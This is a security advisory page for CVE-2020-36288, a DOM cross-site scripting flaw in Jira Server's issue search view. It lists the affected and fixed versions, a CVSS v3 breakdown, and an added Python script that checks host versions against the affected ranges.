
DOM XSS in the issue navigation & search view via parameter pollution - CVE-2020-36288

    • 7.1
    • High
    • CVE-2020-36288

      The issue navigation & search view in Jira Server and Data Center before version 8.5.12, from version 8.6.0 before version 8.13.4, and from version 8.14.0 before version 8.15.1 allows remote attackers to inject arbitrary HTML or JavaScript via a DOM Cross-Site Scripting (XSS) vulnerability caused by parameter pollution.

      Affected versions:

      • version < 8.5.12
      • 8.6.0 ≤ version < 8.13.4
      • 8.14.0 ≤ version < 8.15.1

      Fixed versions:

      • 8.5.12
      • 8.13.4
      • 8.15.1
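A version check against the affected ranges listed above. This is an added example, not Atlassian's code; the function names and the host inventory are constructed for illustration. Versions are compared as integer tuples because a plain string comparison would wrongly place 8.13.10 before the fixed 8.13.4.

```python
import re

# Affected ranges as stated in the advisory:
# (inclusive lower bound, exclusive upper bound).
AFFECTED_RANGES = [
    ((0, 0, 0), (8, 5, 12)),
    ((8, 6, 0), (8, 13, 4)),
    ((8, 14, 0), (8, 15, 1)),
]


def parse_version(text):
    """Turn 'major.minor[.patch][-qualifier]' into an integer tuple."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)(?:\.(\d+))?(?:-[\w.]+)?\s*", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part or 0) for part in m.groups())


def is_affected(version):
    """True if the version falls inside any affected range."""
    v = parse_version(version)
    return any(low <= v < high for low, high in AFFECTED_RANGES)


def audit(inventory):
    """Return the sorted host names whose Jira version is affected."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))


# Constructed inventory (hypothetical host names and versions).
INVENTORY = {
    "jira-prod": "8.13.10",
    "jira-stage": "8.13.3",
    "jira-legacy": "7.13.0",
    "jira-lts": "8.5.12",
    "jira-dev": "8.14.0",
}

if __name__ == "__main__":
    for host in audit(INVENTORY):
        print(f"{host}: {INVENTORY[host]} is affected by CVE-2020-36288")
```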

      Atlassian would like to credit Peter af Geijerstam for reporting this issue.

            [JRASERVER-72115] DOM XSS in the issue navigation & search view via parameter pollution - CVE-2020-36288

            David Black added a comment - - edited

            This is an independent assessment and you should evaluate its applicability to your own IT environment.

            CVSS v3 score: 7.1 => High severity

            Exploitability Metrics

            Attack Vector: Network
            Attack Complexity: Low
            Privileges Required: None
            User Interaction: Required

            Scope Metric

            Scope: Unchanged

            Impact Metrics

            Confidentiality: High
            Integrity: Low
            Availability: None

            https://asecurityteam.bitbucket.io/cvss_v3/#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
